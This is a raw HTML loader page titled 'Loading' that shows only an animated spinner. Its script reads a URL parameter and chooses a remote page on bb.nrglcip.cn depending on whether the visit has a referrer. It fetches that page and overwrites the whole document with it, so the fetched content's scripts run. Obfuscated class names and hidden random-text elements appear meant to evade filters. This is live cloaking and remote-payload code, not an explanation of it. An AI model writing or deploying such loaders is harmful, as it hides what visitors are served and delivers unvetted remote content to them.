<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dL2yls {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dL2yls .NdCuqKSfpI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dL2yls .content {
            line-height: 50px;
            text-align: center
        }

        .dL2yls .img {
            width: 100%
        }

        .dL2yls .Yt3Ee2IYxHt {
            text-align: center
        }

        .dL2yls .Yt3Ee2IYxHt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dL2yls .Yt3Ee2IYxHt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dL2yls .Yt3Ee2IYxHt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dL2yls .Yt3Ee2IYxHt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dL2yls .Yt3Ee2IYxHt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dL2yls .Yt3Ee2IYxHt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dL2yls .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dCiRhmht64b4t(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var skCj3Y2 = dCiRhmht64b4t('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ skCj3Y2 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ skCj3Y2 +".html?a=share";
		}
		
        EWnuUuDM=url+"#"+new Date().getTime();
        EWnuUuDM && function() {
            $.get(EWnuUuDM, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >R0HHXE38zTKk7efcF7</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>QYVKQzvLuyyVcgAorc95kwCT</a>
<a  href='#' style='display:none'>QYVKQzvLuyyVcgAorc95kwCT</a>
<div style='display:none'>C0CMDspciI2f8A77TSRPTaKmk7iUIIQurnw9CGkIv5e3JAfJbxr1e9O1nvaMT5vhxjm</div>
<div style='display:none'>C0CMDspciI2f8A77TSRPTaKmk7iUIIQurnw9CGkIv5e3JAfJbxr1e9O1nvaMT5vhxjm</div>
<img  src='' style='display:none'>
<p  style='display:none'>tlGC6FwjUegSmFnvcbvwke9XWQ44CDBmyk7A4IkcGVgH5EdFnX9Ac6ejAFQRMlKNDXUlL19CN549PquABmZts</p><div class="dL2yls">
    <div class="NdCuqKSfpI">
        <div class="Yt3Ee2IYxHt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>RhXRBBPZG7oUJWLFaaecLzBhDjUmTZxROzOUg5IkNqakHqCjH7cFx0uazgzaybckjGeL2dno3nt06VireMoEWy3Wi3GW4639DA8</span>
<ul style='display:none' >PKRRpSH0Thtw1AYX4TZgMUKlqxqMkBRIr2</ul>
<ul style='display:none' >PKRRpSH0Thtw1AYX4TZgMUKlqxqMkBRIr2</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >JmEOP07Vmkhtsf1KFGi1oe5fLDh5jAdpf</h1>
<img  src='' style='display:none'>
<b style='display:none' >gLPuBNhQxB3sHLZ</b></body>
</html>